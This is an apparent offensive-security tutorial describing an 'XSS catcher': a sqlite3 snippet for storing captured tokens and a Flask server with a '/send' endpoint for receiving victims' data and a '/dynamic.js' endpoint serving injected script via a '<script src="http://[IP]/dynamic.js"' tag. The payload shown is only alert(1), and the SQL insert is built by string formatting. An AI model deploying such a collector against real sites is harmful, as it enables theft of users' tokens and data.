XSS Catcher

When do we need it

Sometimes during web exploitatiotion we will find XSS. If we want to chain a few vulnerabilities together in a script we have to somehow catch the requests from the victims with valuable information.

The tutorial below will instruct you on how can you catch the data and store it in order to later reuse it in your python exploit.

Database handling example

Below you can find short code which covers the most important functions provided by sqlite3 library

import sqlite3
import os

# filename to store databse in
dbfile = "sqlite.db"

# drops the database if it is not blank
if os.path.exists(dbfile):
    os.remove(dbfile)

# create the database
conn = sqlite3.connect(dbfile) # connection to database (file)
cursor = conn.cursor() # lets you execute the queries

# create table in the database
query = "CREATE TABLE IF NOT EXISTS data (id INTEGER PRIMARY KEY AUTOINCREMENT, token TEXT)"
cursor.execute(query)
conn.commit()

# insert data
text = "123"
query = "INSERT INTO data (token) values (\"{}\")".format(text)
cursor.execute(query)
conn.commit()

# get data
query = "SELECT * FROM data"
rows = cursor.execute(query)
data = rows.fetchall()
print(data)

Quick API Example

API application:

from flask import Flask, request, Response

app = Flask(__name__)

# usage:
# curl -k "http://127.0.0.1:80/send?data=test"
@app.route('/send')
def send():
    query = request.args.get('data')
    return 'OK'

# usage:
# <script src="http://[IP]/dynamic.js"
@app.route("/dynamic.js")
def dynamic_js():
    js_code = """
    alert(1)
    """
    return Response(js_code, mimetype="application/javascript")

if __name__ == '__main__':
    app.run(port=80, host='0.0.0.0')